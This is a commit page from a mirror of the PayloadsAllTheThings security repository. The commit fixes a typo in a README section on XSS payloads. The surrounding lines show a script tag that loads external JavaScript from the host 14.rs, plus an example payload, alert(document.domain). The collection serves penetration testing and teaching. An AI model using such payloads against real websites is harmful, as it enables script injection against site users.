mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Update README.md
Correct misspelling
This commit is contained in:
parent
6524c8e544
commit
8e26277407
1 changed files with 1 additions and 1 deletions
|
@ -92,7 +92,7 @@ XSS for HTML5
|
|||
XSS using script tag (external payload)
|
||||
```javascript
|
||||
<script src=14.rs>
|
||||
you can alsoo specify an arbitratry payload with 14.rs/#payload
|
||||
you can also specify an arbitratry payload with 14.rs/#payload
|
||||
e.g: 14.rs/#alert(document.domain)
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue